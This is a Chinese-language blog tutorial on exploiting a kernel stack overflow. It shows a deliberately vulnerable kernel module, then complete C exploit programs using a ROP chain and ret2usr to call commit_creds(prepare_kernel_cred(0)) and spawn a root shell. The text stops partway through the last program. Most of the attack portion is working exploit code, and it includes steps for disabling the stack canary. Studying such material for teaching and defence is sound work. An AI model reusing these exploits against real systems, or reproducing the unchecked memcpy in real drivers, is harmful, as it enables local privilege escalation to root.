<!DOCTYPE html>
<html  lang="zh">
<head>
    <meta charset="utf-8" />

<meta name="generator" content="Hexo 3.9.0" />

<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" />

<title>Linux Kernel Pwn Ⅲ：Stack Overflow - Mask&#39;s blogs</title>


    <meta name="description" content="简单介绍内核中栈溢出的利用">
<meta name="keywords" content="pwn,kernel">
<meta property="og:type" content="article">
<meta property="og:title" content="Linux Kernel Pwn Ⅲ：Stack Overflow">
<meta property="og:url" content="Mask6asok.github.io/2020/02/06/Linux_Kernel_Pwn_3.html">
<meta property="og:site_name" content="Mask&#39;s blogs">
<meta property="og:description" content="简单介绍内核中栈溢出的利用">
<meta property="og:locale" content="zh-CN">
<meta property="og:image" content="/images/og_image.png">
<meta property="og:updated_time" content="2020-02-06T14:35:27.400Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="Linux Kernel Pwn Ⅲ：Stack Overflow">
<meta name="twitter:description" content="简单介绍内核中栈溢出的利用">
<meta name="twitter:image" content="/images/og_image.png">







<link rel="icon" href="/images/favicon.svg">


<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bulma@0.7.2/css/bulma.css">
<link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.4.1/css/all.css">
<link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Ubuntu:400,600|Source+Code+Pro">
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/highlight.js@9.12.0/styles/atom-one-light.css">


    
    
<style>body>.footer,body>.navbar,body>.section{opacity:0}</style>

    
    
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/lightgallery@1.6.8/dist/css/lightgallery.min.css">
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/justifiedGallery@3.7.0/dist/css/justifiedGallery.min.css">

    
    
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/outdatedbrowser@1.1.5/outdatedbrowser/outdatedbrowser.min.css">

    
    
    
    
<link rel="stylesheet" href="/css/back-to-top.css">

    
    
    
    
    
    
    
    <link rel="stylesheet" href="/css/progressbar.css">
<script src="https://cdn.jsdelivr.net/npm/pace-js@1.0.2/pace.min.js"></script>
    
    
    


<link rel="stylesheet" href="/css/style.css">
</head>
<body class="is-3-column">
    <nav class="navbar navbar-main">
    <div class="container">
        <div class="navbar-brand is-flex-center">
            <a class="navbar-item navbar-logo" href="/">
            
                <img src="/images/logo.ico" alt="Linux Kernel Pwn Ⅲ：Stack Overflow" height="28">
            
            </a>
        </div>
        <div class="navbar-menu">
            
            <div class="navbar-start">
                
                <a class="navbar-item"
                href="/">Home</a>
                
                <a class="navbar-item"
                href="/archives">Archives</a>
                
                <a class="navbar-item"
                href="/categories">Categories</a>
                
                <a class="navbar-item"
                href="/tags">Tags</a>
                
                <a class="navbar-item"
                href="/about">About</a>
                
            </div>
            
            <div class="navbar-end">
                
                
                <a class="navbar-item is-hidden-tablet catalogue" title="目录" href="javascript:;">
                    <i class="fas fa-list-ul"></i>
                </a>
                
                
                <a class="navbar-item search" title="搜索" href="javascript:;">
                    <i class="fas fa-search"></i>
                </a>
                
            </div>
        </div>
    </div>
</nav>
    
    <section class="section">
        <div class="container">
            <div class="columns">
                <div class="column is-8-tablet is-8-desktop is-9-widescreen has-order-2 column-main">
<div class="card">
    
    <div class="card-content article ">
        
        <div class="level article-meta is-size-7 is-uppercase is-mobile is-overflow-x-auto">
            <div class="level-left">
                <time class="level-item has-text-grey" datetime="2020-02-06T14:50:43.349Z">2020-02-06</time>
                
                <div class="level-item">
                <a class="has-link-grey -link" href="/categories/Pwn/">Pwn</a>
                </div>
                
                
                <span class="level-item has-text-grey">
                    
                    
                    9 分钟 读完 (大约 1365 个字)
                </span>
                
                
            </div>
        </div>
        
        <h1 class="title is-size-3 is-size-4-mobile has-text-weight-normal">
            
                Linux Kernel Pwn Ⅲ：Stack Overflow
            
        </h1>
        <div class="content">
            <p>简单介绍内核中栈溢出的利用</p>
<a id="more"></a>
<p>内核态中的栈与用户态的栈功能是一致的，因此可以使用平常栈溢出的操作，劫持函数返回地址</p>
<h1 id="Vul-LKM"><a href="#Vul-LKM" class="headerlink" title="Vul LKM"></a>Vul LKM</h1><p>buf_overflow.c内容</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;linux/init.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;linux/module.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;linux/kernel.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;linux/proc_fs.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">buf_overflow_write</span><span class="params">(struct file *file, <span class="keyword">const</span> <span class="keyword">char</span> *buf, <span class="keyword">unsigned</span> <span class="keyword">long</span> len)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="keyword">char</span> localbuf[<span class="number">8</span>];</span><br><span class="line">    <span class="built_in">memcpy</span>(localbuf, buf, len);</span><br><span class="line">    <span class="keyword">return</span> len;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">static</span> <span class="keyword">int</span> __<span class="function">init <span class="title">buf_overflow_init</span><span class="params">(<span class="keyword">void</span>)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    printk(KERN_ALERT <span class="string">"buf_overflow driver init!\n"</span>);</span><br><span class="line">    create_proc_entry(<span class="string">"overflow"</span>, <span class="number">0666</span>, <span class="number">0</span>)-&gt;write_proc = buf_overflow_write;</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">static</span> <span class="keyword">void</span> __<span class="function"><span class="built_in">exit</span> <span class="title">buf_overflow_exit</span><span class="params">(<span class="keyword">void</span>)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    printk(KERN_ALERT <span class="string">"buf_overflow driver exit!\n"</span>);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">module_init(buf_overflow_init);</span><br><span class="line">module_exit(buf_overflow_exit);</span><br></pre></td></tr></table></figure>
<h1 id="Exploit"><a href="#Exploit" class="headerlink" title="Exploit"></a>Exploit</h1><p>pwn.c内容</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;stdlib.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;string.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;sys/stat.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;fcntl.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="keyword">char</span> buf[] = <span class="string">"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBB"</span>;</span><br><span class="line">    <span class="keyword">int</span> fd = open(<span class="string">"/proc/overflow"</span>, O_WRONLY);</span><br><span class="line">    write(fd, buf, <span class="keyword">sizeof</span>(buf));</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>在<code>buf_overflow_write</code>函数下断进入到<code>memcpy</code></p>
<p><img src="https://i.loli.net/2020/01/28/bYfiFW4n9q5v6Dg.png" alt="1580095843535.png"></p>
<p>复制过后，可以发下，返回地址被 BBBBBBBB 覆盖了</p>
<p><img src="https://i.loli.net/2020/01/28/olAMziQhEdcTZaW.png" alt="1580095892778.png"></p>
<p>继续执行提示Kernel panic那是因为canary的问题，关闭canary保护需要编辑源码中的<code>.config</code>文件，注释掉 <code>CONFIG_CC_STACKPROTECTOR=y</code> 这一项，大约在349行，然后重新编译内核，重新编译LKM，payload减少canary那8个字节，运行发现RIP停在了0x4141414141414141，也就是劫持了执行流</p>
<h2 id="ROP"><a href="#ROP" class="headerlink" title="ROP"></a>ROP</h2><p>劫持执行流，利用ROP来实现<code>commit_creds(prepare_kernel_cred(0))</code>提权。提权这两个函数的ROP就不分析了，和内核态一样的</p>
<p>ROP执行完提权函数，需要从内核态返回到用户态，64位返回用户态是这两个指令</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">swapgs</span><br><span class="line">iretq</span><br></pre></td></tr></table></figure>
<p>内核中的gadget可以从vmlinux中提取出来，不过使用ROPgadget出来的部分不是可执行的，<code>iretq</code>可执行的gadget可以这样提取</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">objdump -j .text -d vmlinux | grep iretq | head -1</span><br></pre></td></tr></table></figure>
<p>其中<code>iretq</code>所需的栈结构是</p>
<figure class="highlight tex"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">RIP 	用户地址</span><br><span class="line">CS		代码段选择器</span><br><span class="line">EFLAGS	状态信息</span><br><span class="line">RSP		用户堆栈</span><br><span class="line">SS		堆栈段选择器</span><br></pre></td></tr></table></figure>
<p>可以用下面代码获得信息，RSP可以直接&amp;一个局部变量来获取</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">unsigned</span> <span class="keyword">long</span> user_cs, user_ss, user_rflags;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">static</span> <span class="keyword">void</span> <span class="title">save_state</span><span class="params">()</span> </span>&#123;</span><br><span class="line">        <span class="keyword">asm</span>(</span><br><span class="line">        <span class="string">"movq %%cs, %0\n"</span></span><br><span class="line">        <span class="string">"movq %%ss, %1\n"</span></span><br><span class="line">        <span class="string">"pushfq\n"</span></span><br><span class="line">        <span class="string">"popq %2\n"</span></span><br><span class="line">        : <span class="string">"=r"</span> (user_cs), <span class="string">"=r"</span> (user_ss), <span class="string">"=r"</span> (user_rflags) : : <span class="string">"memory"</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>所以rop chain就是</p>
<figure class="highlight tex"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">prepare_kernel_cred</span><br><span class="line">commit_creds</span><br><span class="line">swapgs</span><br><span class="line">iretq</span><br><span class="line">RIP</span><br><span class="line">CS</span><br><span class="line">EFLAGS</span><br><span class="line">RSP</span><br><span class="line">SS</span><br></pre></td></tr></table></figure>
<p><img src="https://i.loli.net/2020/01/28/tzfJo8pYVR4lByu.png" alt="1580189553138.png"></p>
<p>执行下去成功到达getshell函数</p>
<p><img src="https://i.loli.net/2020/01/28/uKtRhV4ip8SDdPz.png" alt="1580189602263.png"></p>
<p>拿到root shell</p>
<p><img src="https://i.loli.net/2020/01/28/PMv2s1RHQYAVXwh.png" alt="1580189674431.png"></p>
<p>完整payload</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;stdlib.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;string.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;sys/stat.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;fcntl.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="meta">#<span class="meta-keyword">define</span> commit_creds 0xffffffff81081290</span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">define</span> prepare_kernel_cred 0xffffffff81081480</span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">define</span> prdi_ret 0xffffffff8133791d</span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">define</span> rax2rdi_prbp_ret 0xffffffff812858df</span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">define</span> prcx_ret 0xffffffff810d7b73</span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">define</span> rax2rdi_callrcx 0xffffffff81118825</span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">define</span> rax2rdi_c_prbp_ret 0xffffffff812858dc</span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">define</span> iretq 0xffffffff8100c93a</span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">define</span> swapgs_pfq 0xffffffff8100ce6a</span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">define</span> back 0xffffffff8100bfad</span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">define</span> prcx 0xffffffff810d7b73</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">char</span> payload[<span class="number">1000</span>] = &#123;<span class="number">0</span>&#125;;</span><br><span class="line"><span class="keyword">int</span> payload_len = <span class="number">0</span>;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">join_data</span><span class="params">(<span class="keyword">long</span> <span class="keyword">long</span> data)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="keyword">unsigned</span> <span class="keyword">char</span> buf[<span class="number">8</span>] = &#123;<span class="number">0</span>&#125;;</span><br><span class="line">    <span class="built_in">memcpy</span>(buf, &amp;data, <span class="number">8</span>);</span><br><span class="line">    <span class="built_in">memcpy</span>(payload + payload_len, buf, <span class="number">8</span>);</span><br><span class="line">    payload_len += <span class="number">8</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">join_str</span><span class="params">(<span class="keyword">char</span> *buf)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="keyword">int</span> len = <span class="built_in">strlen</span>(buf);</span><br><span class="line">    <span class="built_in">memcpy</span>(payload + payload_len, buf, len);</span><br><span class="line">    payload_len += len;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">get_shell</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    execl(<span class="string">"/bin/sh"</span>, <span class="string">"sh"</span>, <span class="literal">NULL</span>);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">unsigned</span> <span class="keyword">long</span> <span class="keyword">long</span> user_cs, user_ss, user_rflags;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">static</span> <span class="keyword">void</span> <span class="title">save_state</span><span class="params">()</span> </span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="keyword">asm</span>(</span><br><span class="line">    <span class="string">"movq %%cs, %0\n"</span></span><br><span class="line">    <span class="string">"movq %%ss, %1\n"</span></span><br><span class="line">    <span class="string">"pushfq\n"</span></span><br><span class="line">    <span class="string">"popq %2\n"</span></span><br><span class="line">    : <span class="string">"=r"</span> (user_cs), <span class="string">"=r"</span> (user_ss), <span class="string">"=r"</span> (user_rflags) : : <span class="string">"memory"</span>);</span><br><span class="line">    <span class="comment">//printf("%p,%p,%p", user_cs, user_ss, user_rflags);</span></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;   </span><br><span class="line">    save_state();</span><br><span class="line">    <span class="keyword">int</span> <span class="built_in">stack</span>;</span><br><span class="line">    join_str(<span class="string">"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"</span>);</span><br><span class="line">    join_data(prdi_ret);</span><br><span class="line">    join_data(<span class="number">0</span>);</span><br><span class="line">    join_data(prepare_kernel_cred);</span><br><span class="line">    join_data(rax2rdi_c_prbp_ret);</span><br><span class="line">    join_data(&amp;<span class="built_in">stack</span>);</span><br><span class="line">    join_data(commit_creds);</span><br><span class="line">    join_data(swapgs_pfq);</span><br><span class="line">    join_data(user_rflags);</span><br><span class="line">    join_data(iretq);</span><br><span class="line">    join_data(&amp;get_shell);</span><br><span class="line">    join_data(user_cs);</span><br><span class="line">    join_data(user_rflags);</span><br><span class="line">    join_data(&amp;<span class="built_in">stack</span>);</span><br><span class="line">    join_data(user_ss);</span><br><span class="line">    <span class="keyword">int</span> fd = open(<span class="string">"/proc/overflow"</span>, O_WRONLY);</span><br><span class="line">    write(fd, payload, payload_len);</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<h2 id="ret2usr"><a href="#ret2usr" class="headerlink" title="ret2usr"></a>ret2usr</h2><p>既然可以劫持返回地址，那么可以考虑将返回地址修改成用户程序的地址，那么就相当于以ring 0级别执行用户程序，进而直接提权</p>
<p>因此在用户程序中利用汇编写一段提权与返回用户态，则可以直接拿到root shell</p>
<p>覆盖内核函数返回地址为用户程序</p>
<p><img src="https://i.loli.net/2020/01/28/QOImK7qHoVRA15d.png" alt="1580194333224.png"></p>
<p>用户程序中利用内联汇编写相应操作</p>
<p><img src="https://i.loli.net/2020/01/28/Ux8COGtdj4WJnqe.png" alt="1580194496576.png"></p>
<p>布置好栈结构jmp去<code>swapgs</code></p>
<p><img src="https://i.loli.net/2020/01/28/uWPpGQwelMrgIzR.png" alt="1580194553680.png"></p>
<p>执行到<code>iretq</code></p>
<p><img src="https://i.loli.net/2020/01/28/nPe4UFv9EQyOkz1.png" alt="1580194615577.png"></p>
<p>拿到root shell</p>
<p><img src="https://i.loli.net/2020/01/28/ICknbUDL34VZOBr.png" alt="1580194700486.png"></p>
<p>完整paylaod</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;stdlib.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;string.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;sys/stat.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;fcntl.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="meta">#<span class="meta-keyword">define</span> commit_creds 0xffffffff81081290</span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">define</span> prepare_kernel_cred 0xffffffff81081480</span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">define</span> prdi_ret 0xffffffff8133791d</span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">define</span> rax2rdi_prbp_ret 0xffffffff812858df</span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">define</span> prcx_ret 0xffffffff810d7b73</span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">define</span> rax2rdi_callrcx 0xffffffff81118825</span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">define</span> rax2rdi_c_prbp_ret 0xffffffff812858dc</span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">define</span> iretq 0xffffffff8100c93a</span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">define</span> swapgs_pfq 0xffffffff8100ce6a</span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">define</span> back 0xffffffff8100bfad</span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">define</span> prcx 0xffffffff810d7b73</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">char</span> payload[<span class="number">1000</span>] = &#123;<span class="number">0</span>&#125;;</span><br><span class="line"><span class="keyword">int</span> payload_len = <span class="number">0</span>;</span><br><span class="line"><span class="keyword">unsigned</span> <span class="keyword">long</span> <span class="keyword">long</span> user_cs, user_ss, user_rflags;</span><br><span class="line"><span class="keyword">long</span> <span class="keyword">long</span> user_stack = <span class="number">0</span>;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">join_data</span><span class="params">(<span class="keyword">long</span> <span class="keyword">long</span> data)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="keyword">unsigned</span> <span class="keyword">char</span> buf[<span class="number">8</span>] = &#123;<span class="number">0</span>&#125;;</span><br><span class="line">    <span class="built_in">memcpy</span>(buf, &amp;data, <span class="number">8</span>);</span><br><span class="line">    <span class="built_in">memcpy</span>(payload + payload_len, buf, <span class="number">8</span>);</span><br><span class="line">    payload_len += <span class="number">8</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">join_str</span><span class="params">(<span class="keyword">char</span> *buf)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="keyword">int</span> len = <span class="built_in">strlen</span>(buf);</span><br><span class="line">    <span class="built_in">memcpy</span>(payload + payload_len, buf, len);</span><br><span class="line">    payload_len += len;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">launch_shell</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    execl(<span class="string">"/bin/sh"</span>, <span class="string">"sh"</span>, <span class="literal">NULL</span>);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">get_root</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="keyword">char</span>* (*pkc)(<span class="keyword">int</span>) = prepare_kernel_cred;</span><br><span class="line">    <span class="keyword">void</span> (*cc)(<span class="keyword">char</span>*) = commit_creds;</span><br><span class="line">    (*cc)((*pkc)(<span class="number">0</span>));</span><br><span class="line">    <span class="keyword">asm</span>(</span><br><span class="line">        <span class="string">"nop\n"</span></span><br><span class="line">        <span class="string">"mov %0, %%rax\n"</span></span><br><span class="line">        <span class="string">"push %1\n"</span></span><br><span class="line">        <span class="string">"push %2\n"</span></span><br><span class="line">        <span class="string">"push %3\n"</span></span><br><span class="line">        <span class="string">"push %4\n"</span></span><br><span class="line">        <span class="string">"push %5\n"</span></span><br><span class="line">        <span class="string">"push %6\n"</span></span><br><span class="line">        <span class="string">"push %7\n"</span></span><br><span class="line">        <span class="string">"jmp %%rax\n"</span></span><br><span class="line">        :</span><br><span class="line">        : <span class="string">"r"</span> (swapgs_pfq), <span class="string">"r"</span> (user_ss), <span class="string">"r"</span> (&amp;user_stack), <span class="string">"r"</span> (user_rflags), <span class="string">"r"</span> (user_cs), <span class="string">"r"</span> (&amp;launch_shell), <span class="string">"r"</span> (iretq), <span class="string">"r"</span> (user_rflags)</span><br><span class="line">        : <span class="string">"%rax"</span></span><br><span class="line">    );</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">static</span> <span class="keyword">void</span> <span class="title">save_state</span><span class="params">()</span> </span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="keyword">asm</span>(</span><br><span class="line">    <span class="string">"movq %%cs, %0\n"</span></span><br><span class="line">    <span class="string">"movq %%ss, %1\n"</span></span><br><span class="line">    <span class="string">"pushfq\n"</span></span><br><span class="line">    <span class="string">"popq %2\n"</span></span><br><span class="line">    : <span class="string">"=r"</span> (user_cs), <span class="string">"=r"</span> (user_ss), <span class="string">"=r"</span> (user_rflags) : : <span class="string">"memory"</span>);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;   </span><br><span class="line">    save_state();</span><br><span class="line">    <span class="keyword">int</span> <span class="built_in">stack</span>;</span><br><span class="line">    user_stack = &amp;<span class="built_in">stack</span>;</span><br><span class="line">    join_str(<span class="string">"AAAAAAAAAAAAAAAAAAAAAAAA"</span>);</span><br><span class="line">    join_data(&amp;user_stack);</span><br><span class="line">    join_data(&amp;get_root);</span><br><span class="line">    <span class="keyword">int</span> fd = open(<span class="string">"/proc/overflow"</span>, O_WRONLY);</span><br><span class="line">    write(fd, payload, 